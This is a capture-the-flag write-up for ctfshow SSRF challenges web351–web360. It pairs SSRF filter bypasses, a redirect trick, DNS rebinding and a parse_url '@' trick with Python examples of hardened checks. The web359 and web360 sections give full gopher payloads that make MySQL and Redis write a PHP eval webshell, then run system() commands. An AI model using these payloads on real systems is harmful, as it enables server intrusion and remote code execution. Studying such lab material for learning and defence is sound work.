ctfshow web basics: SSRF, web351~web360

Contents

  • SSRF basics
  • web351
  • web352, 353
  • web354
  • web355
  • web356
  • web357
  • web358
  • web359
  • web360

SSRF basics

SSRF (Server-Side Request Forgery)

The idea is to make the server send a request on our behalf to something only it can reach (localhost, internal services), because we cannot reach those from outside. A typical sink looks like this:


<?php
// Typical SSRF sink: the URL comes straight from the client and is fetched server-side.
$url=$_POST['url'];
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);         // leave response headers out of the result
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // return the body instead of printing it
$result=curl_exec($ch);
curl_close($ch);
?>
  • curl_init(): start a curl session for the given URL
  • curl_setopt(): set session options
  • curl_exec(): run the session and fetch the content
  • curl_close(): close the session

gopher protocol
With gopher, curl takes everything after the first character following the port, percent-decodes it, and writes it to the target socket as-is. That first character is the gopher item type and is discarded, so by convention an underscore is used. The decoded bytes that follow can be a complete HTTP GET or POST request, or any other line-based protocol such as MySQL or Redis, which is why gopher turns a plain SSRF into arbitrary TCP writes.

gopher://ip:port/_[stream]

web351

Requesting flag.php directly returns a message that access from the public network is not allowed, so we make the server fetch it for us.

payload:

url=http://127.0.0.1/flag.php

When the server processes this value it simply curls flag.php on itself; the request comes from loopback, so the "internal only" check passes.


web352, 353

The url parameter is read from POST and run through parse_url(); the return value is stored in x.

parse_url() usage: PHP: parse_url - Manual

The challenge requires the scheme to be http or https, and the string must not contain localhost or 127.0.0.

So we need to bypass localhost|127.0.0; 0 can stand in for 127.0.0.1.

payload:

url=http://0/flag.php

Other bypasses:

  • 127.1 is parsed as 127.0.0.1: with inet_aton() the last number fills all the remaining bytes, so the zero octets in the middle can be left out
  • On Linux, 0 (that is, 0.0.0.0) also ends up connecting to 127.0.0.1
  • 127.0.0.0/8 is the whole loopback range: every address from 127.0.0.1 to 127.255.255.254 is the local host
  • An IP address can also be written in another base, for example as a single decimal or hexadecimal integer (see: IP address binary/decimal/hex conversion)

payload:

url=http://127.1/flag.php
url=http://0/flag.php
url=http://127.255.255.254/flag.php
url=http://2130706433/flag.php

(2130706433 is 127.0.0.1 as one 32-bit decimal number: 127 × 256³ + 1.)
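The bypasses above all come from one fact: the filter inspects the string, while the client parses it with inet_aton() semantics. The following added example (not part of the original writeup or the challenge code) implements those parsing rules, shows that a substring blacklist in the style the page describes lets every alternative spelling through, and contrasts it with a check made on the parsed address. The blacklist regex and the sample hosts are constructed for the demonstration.

```python
import ipaddress
import re

LOOPBACK = ipaddress.ip_network("127.0.0.0/8")


def _parse_part(p: str) -> int:
    """One dotted component, with inet_aton() rules: 0x.. is hex, a leading 0 is octal, else decimal."""
    if re.fullmatch(r"0[xX][0-9a-fA-F]+", p):
        return int(p[2:], 16)
    if re.fullmatch(r"0[0-7]*", p):
        return int(p, 8)
    if re.fullmatch(r"[1-9][0-9]*", p):
        return int(p, 10)
    raise ValueError(p)


def inet_aton_compat(host: str):
    """Parse an IPv4 literal the way BSD/glibc inet_aton() does, which is what
    curl, file_get_contents and most libc-based clients use.

    One to four dot-separated parts are accepted and the last part fills every
    byte that is left, so "127.1" and "2130706433" both mean 127.0.0.1.
    Returns an IPv4Address, or None when the string is not an IPv4 literal
    (for example a hostname, which would need DNS resolution instead).
    """
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        vals = [_parse_part(p) for p in parts]
    except ValueError:
        return None
    if any(v > 0xFF for v in vals[:-1]):
        return None
    tail_bits = 8 * (5 - len(vals))      # how many bits the last part covers
    if vals[-1] >= 1 << tail_bits:
        return None
    addr = 0
    for v in vals[:-1]:
        addr = (addr << 8) | v
    return ipaddress.IPv4Address((addr << tail_bits) | vals[-1])


def blacklist_allows(host: str) -> bool:
    """The web352/353-style check as the page describes it: only the literal
    substrings are rejected, so every alternative spelling gets through."""
    return re.search(r"localhost|127\.0\.0", host, re.I) is None


def targets_localhost(host: str) -> bool:
    """Decide on the parsed address instead of the string. 0.0.0.0 is treated
    as local too, because on Linux a connect() to it reaches the local host."""
    ip = inet_aton_compat(host)
    if ip is None:
        return False   # hostname: resolve it and check the resolved address
    return ip in LOOPBACK or ip.is_unspecified


if __name__ == "__main__":
    # Constructed sample hosts: the page's payloads plus octal/hex spellings.
    for h in ["127.0.0.1", "127.1", "0", "2130706433", "0x7f.1",
              "0177.0.0.1", "127.255.255.254", "example.com"]:
        print(f"{h:>16} -> {str(inet_aton_compat(h)):<15} "
              f"blacklist allows: {blacklist_allows(h)!s:<5} local: {targets_localhost(h)}")
```

A hostname returns None here on purpose: for names the only sound check is to resolve, validate the resolved address, and then connect to that exact address, which is the point of web357 below.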

web354

localhost, 1 and 0 are all filtered.

With both 1 and 0 gone, none of the previous payloads work any more.

Method 1: point a domain at it

Add an A record in a domain you control that points to 127.0.0.1.

Or use http://sudo.cc, a domain that points to 127.0.0.1 (verify with a DNS lookup before relying on it, since a third party's record can change at any time).

payload:

url=http://sudo.cc/flag.php

Method 2: 302 redirect

Put this in a page on your own VPS:

<?php header("Location: http://127.0.0.1/flag.php"); ?>

When the server receives the URL of our VPS it curls it, follows the redirect, and ends up fetching flag.php on its own 127.0.0.1. This only works when the server-side client follows redirects (curl with CURLOPT_FOLLOWLOCATION set, or file_get_contents(), which follows them by default); the host check is applied to the original URL, not to the redirect target.

payload:

url=http://xxxxx/xxx.php

web355

Filtering: in http://[host]/[path], the host part may be at most 5 characters long (127.1 is exactly five).

url=http://127.1/flag.php
url=http://0/flag.php

web356

Filtering: in http://[host]/[path], the host part may be at most 3 characters long, which leaves the single-character 0.

url=http://0/flag.php

web357

Because the code calls gethostbyname() to obtain the real IP address and checks that, pointing a domain at 127.0.0.1 no longer works; the 302 redirect method and DNS rebinding still do.

DNS rebinding

The attack relies on a DNS server that answers two successive queries for the same name with different IP addresses: the first answer is a legitimate public IP, the second is the target address. The same trick is used to bypass the browser's same-origin policy.

Back to the challenge: the domain is resolved twice, once by gethostbyname() for the check and a second time, implicitly, when file_get_contents() connects. If the check sees the public IP and the connect sees 127.0.0.1, the filter is bypassed, and that is exactly what DNS rebinding provides.

Register an account at CEYE, open the profile page, click "+ New DNS" at the bottom, and add 127.0.0.1 and 39.156.66.10 (any reachable public IP will do).

The CEYE DNS Rebinding page says:

If your identifier is abcdef.ceye.io, then your DNS rebinding host is r.abcdef.ceye.io.

So to use rebinding, prefix the domain with r.

payload:

url=http://r.xxxxx.ceye.io/flag.php

If it doesn't work, send the request a few more times: which address each of the two lookups receives depends on the order the rebinding server hands them out and on DNS caching, so not every attempt succeeds.
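The check-then-fetch race above is a time-of-check/time-of-use bug, and it is fixed by resolving once and connecting to the validated address. The following added example (not the challenge's code or CEYE's) models the two lookups with a constructed resolver that alternates its answers the way the r.<id>.ceye.io host does, and shows the web357 pattern handing the attacker the local page while the pinned variant does not. The resolver, the backend stub and the addresses are constructed for the demonstration.

```python
import ipaddress
from itertools import cycle


class RebindingResolver:
    """Constructed stand-in for a rebinding DNS server: successive queries for
    the same name get the next address from the list, here the public IP
    first and 127.0.0.1 second."""

    def __init__(self, answers):
        self._answers = cycle(answers)
        self.queries = 0

    def gethostbyname(self, host: str) -> str:
        self.queries += 1
        return next(self._answers)


def is_internal(ip: str) -> bool:
    """Reject loopback, RFC1918, link-local, reserved and unspecified addresses."""
    a = ipaddress.ip_address(ip)
    return (a.is_loopback or a.is_private or a.is_link_local
            or a.is_reserved or a.is_unspecified)


def backend(ip: str) -> str:
    """Constructed stand-in for the TCP connect: what each address serves."""
    return "local flag.php" if ip == "127.0.0.1" else "public page"


def vulnerable_fetch(host: str, resolver: RebindingResolver) -> str:
    """web357 pattern: gethostbyname() once for the check, then the HTTP
    client (file_get_contents) resolves the same name a second time."""
    ip = resolver.gethostbyname(host)
    if is_internal(ip):
        return "blocked"
    return backend(resolver.gethostbyname(host))   # second lookup may differ


def pinned_fetch(host: str, resolver: RebindingResolver) -> str:
    """Resolve once, validate that address, and connect to exactly that
    address (with curl: CURLOPT_RESOLVE "host:port:ip"); the hostname only
    travels in the Host header."""
    ip = resolver.gethostbyname(host)
    if is_internal(ip):
        return "blocked"
    return backend(ip)


if __name__ == "__main__":
    answers = ["39.156.66.10", "127.0.0.1"]
    print(vulnerable_fetch("r.abcdef.ceye.io", RebindingResolver(answers)))
    print(pinned_fetch("r.abcdef.ceye.io", RebindingResolver(answers)))
```

Pinning the address closes the rebinding window but not the 302 method from web354: a client that follows redirects must re-run the same validation on every redirect target, not only on the first URL.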


web358

Regex: the url must start with http://ctf. and end with show.

  • When parse_url() finds an '@' in the authority, everything before it is the user part
  • file_get_contents() connects to host:port/path; the user part plays no role

So we build the payload:

url=http://ctf.@127.0.0.1/flag.php#show

The regex sees ctf. at the start and show at the end, while parse_url() yields user = ctf., host = 127.0.0.1, path = /flag.php; the #show fragment is never sent.
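This is a parser differential: the regex and the URL parser disagree about which part of the string is the host. The following added example (not the challenge's code) reconstructs the gate from the page's description, shows what a URL parser that handles userinfo like PHP's parse_url() makes of the payload, and gives a check that decides on the parsed host against an allow-list instead. The regex, the allow-list and the sample URLs are assumptions made for the demonstration.

```python
import re
from urllib.parse import urlsplit

# Reconstruction of the web358 gate from the page's description (start with
# "http://ctf.", end with "show"); not the challenge's own source.
GATE = re.compile(r"^http://ctf\..*show$", re.I)

# Assumed allow-list for the hardened check; the page names no intended host.
ALLOWED_HOSTS = {"ctf.show"}


def gate_allows(url: str) -> bool:
    """String-level check: matches on the raw URL, never on the parsed host."""
    return GATE.match(url) is not None


def effective_target(url: str):
    """What the HTTP client actually uses. Like PHP's parse_url(), urlsplit()
    treats everything before the last '@' of the authority as user:password;
    the host is what follows it, and the '#...' fragment is never sent."""
    u = urlsplit(url)
    return {"user": u.username, "host": u.hostname, "port": u.port,
            "path": u.path, "fragment": u.fragment}


def hardened_allows(url: str) -> bool:
    """Decide on the parsed host, reject userinfo outright, and compare the
    host against an allow-list rather than matching the raw string."""
    u = urlsplit(url)
    return (u.scheme == "http" and u.username is None
            and u.hostname in ALLOWED_HOSTS)


if __name__ == "__main__":
    payload = "http://ctf.@127.0.0.1/flag.php#show"
    print(gate_allows(payload), effective_target(payload), hardened_allows(payload))
```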

web359

Hint: attack a MySQL instance that has no password.

There is a login page; click login and capture the request. The suspicious returl parameter is vulnerable to SSRF.

Use the Gopherus tool with its mysql module, the default user root, and a query that writes a webshell to a file (this needs the MySQL user to hold the FILE privilege and secure_file_priv not to restrict the target directory):

python gopherus.py  --exploit mysql

Give MySQL username: root
Give query to execute: select "<?php eval($_POST[cmd]); ?>" into outfile "/var/www/html/cmd.php";
Your gopher link is ready to do SSRF :

gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%4c%00%00%00%03%20%73%65%6c%65%63%74%20%22%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%63%6d%64%5d%29%3b%20%3f%3e%22%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%22%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%63%6d%64%2e%70%68%70%22%3b%01%00%00%00%01

The link has to be URL-encoded once more (from the _ onward): the web server decodes the POST parameter once, and curl decodes the gopher selector again before writing it to the socket, so every % in the generated link must arrive as %25. payload:

returl=gopher://127.0.0.1:3306/_%25a3%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2572%256f%256f%2574%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%254c%2500%2500%2500%2503%2520%2573%2565%256c%2565%2563%2574%2520%2522%253c%253f%2570%2568%2570%2520%2565%2576%2561%256c%2528%2524%255f%2550%254f%2553%2554%255b%2563%256d%2564%255d%2529%253b%2520%253f%253e%2522%2520%2569%256e%2574%256f%2520%256f%2575%2574%2566%2569%256c%2565%2520%2522%252f%2576%2561%2572%252f%2577%2577%2577%252f%2568%2574%256d%256c%252f%2563%256d%2564%252e%2570%2568%2570%2522%253b%2501%2500%2500%2500%2501

Then request cmd.php and POST:

cmd=system('cat /flag.txt');

web360

Redis can be attacked through gopher with Gopherus as well. It works because Redis listens on 127.0.0.1:6379 without authentication and will write its RDB dump to any directory its process user can write, including the web root:

$ python gopherus.py  --exploit redis

What do you want?? (ReverseShell/PHPShell): php
Give web root location of server (default is /var/www/html):
Give PHP Payload (We have default PHP Shell): <?php eval($_POST[cmd]); ?>
Your gopher link is Ready to get PHP Shell:

gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2431%0D%0A%0A%0A%3C%3Fphp%20eval%28%24_POST%5Bcmd%5D%29%3B%20%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A

When it's done you can get PHP Shell in /shell.php at the server with `cmd` as parameter.

The payload has to be URL-encoded one more time for the same reason as in web359 (here the whole link, gopher:// included, is encoded; encoding only the part after _ works just as well):

url=gopher%3A%2F%2F127.0.0.1%3A6379%2F_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252431%250D%250A%250A%250A%253C%253Fphp%2520eval%2528%2524_POST%255Bcmd%255D%2529%253B%2520%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A%2Fvar%2Fwww%2Fhtml%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A

Then request /shell.php and run commands:

cmd=system("cat /flaaag");
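Generated payloads are opaque strings, so it is worth knowing how to build and, more importantly, decode them. The following added example (written for this page, not Gopherus's code) builds the Redis RESP command sequence for web360 by hand, applies the gopher encoding and then the second form encoding discussed under web359, and decodes a gopher link back into the commands it will send, which is the check to run on any generated payload before firing it. Run stand-alone it reproduces the two Gopherus links shown above; the host, port, web root and file name are the page's values.

```python
from urllib.parse import quote, unquote


def resp(*args: str) -> str:
    """Encode one Redis command as a RESP array of bulk strings."""
    out = f"*{len(args)}\r\n"
    for a in args:
        out += f"${len(a.encode())}\r\n{a}\r\n"
    return out


def redis_webshell_stream(webroot: str = "/var/www/html", filename: str = "shell.php",
                          php: str = "<?php eval($_POST[cmd]); ?>") -> str:
    """The command sequence Gopherus emits: clear the keyspace, store the PHP in a
    key padded with newlines so the RDB framing around it lands outside the PHP
    tags, point the dump file at the web root, then SAVE."""
    return (resp("flushall")
            + resp("set", "1", f"\n\n{php}\n\n")
            + resp("config", "set", "dir", webroot)
            + resp("config", "set", "dbfilename", filename)
            + resp("save")
            + "\n")


def gopher_url(host: str, port: int, stream: str) -> str:
    """gopher://host:port/_<percent-encoded stream>: the '_' is the gopher item
    type byte, which curl drops; everything after it is written to the socket."""
    return f"gopher://{host}:{port}/_" + quote(stream, safe="/")


def form_encode(url: str) -> str:
    """Second encoding for the POST body. The web server decodes the parameter
    once and curl decodes the gopher selector again, so '%' must arrive as '%25'."""
    return quote(url, safe="")


def parse_resp(stream: str):
    """Decode a RESP stream back into a list of commands (each a list of args)."""
    cmds, pos = [], 0
    while pos < len(stream) and stream[pos] == "*":
        end = stream.index("\r\n", pos)
        argc, pos = int(stream[pos + 1:end]), end + 2
        args = []
        for _ in range(argc):
            end = stream.index("\r\n", pos)
            length, pos = int(stream[pos + 1:end]), end + 2
            args.append(stream[pos:pos + length])
            pos += length + 2
        cmds.append(args)
    return cmds


def decode_gopher(url: str):
    """Undo the gopher encoding and parse the stream: the check to run on any
    generated payload before sending it."""
    return parse_resp(unquote(url.split("/_", 1)[1]))


if __name__ == "__main__":
    link = gopher_url("127.0.0.1", 6379, redis_webshell_stream())
    print(link)
    print("url=" + form_encode(link))
    for cmd in decode_gopher(link):
        print(cmd)
```

Decoding before sending catches the two mistakes that silently break these payloads: a bulk-string length that no longer matches after editing the PHP, and a missing second encoding layer, which leaves the server writing literal "%0D%0A" into the socket instead of line breaks.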

Further reading:

  • CTFshow刷题日记-WEB-SSRF(web351-360)SSRF总结 - UCloud云社区
  • CTFshow_Web_SSRF——web351~web360(除354、357)_Ho1aAs的博客-CSDN博客

